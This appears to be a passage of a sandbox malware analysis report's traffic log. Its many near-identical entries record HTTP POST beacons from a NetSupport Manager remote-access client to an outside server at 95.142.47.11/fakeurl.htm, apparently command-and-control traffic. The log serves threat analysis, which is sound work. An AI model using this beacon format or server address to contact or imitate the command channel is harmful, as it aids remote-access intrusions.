                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.769902945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.869698048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:08.969700098 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.069936991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.170679092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.271739006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.371678114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.472665071 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.572961092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.673712015 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.773710012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.874089003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:09.975019932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.075031996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.175803900 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.277240992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.378699064 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.478898048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.578923941 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.679724932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.779901028 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.879933119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:10.980689049 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.080903053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.180900097 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.281783104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.381671906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.482675076 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.582649946 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.683657885 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.783690929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.883672953 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:11.984647036 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.085679054 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.185700893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.287077904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.387639046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.488010883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.635119915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.735757113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:12.835705042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.178189993 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.278723001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.378664017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.479671955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.579859972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.679689884 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.779855967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.879853964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:13.980690002 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.081702948 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.181749105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.282812119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.382836103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.482862949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.584121943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.683696985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.783715010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.883760929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:14.985434055 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.085681915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.185920000 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.286720991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.386912107 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.486686945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.586723089 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.687649012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.787889957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.888899088 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:15.989639044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.090857983 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
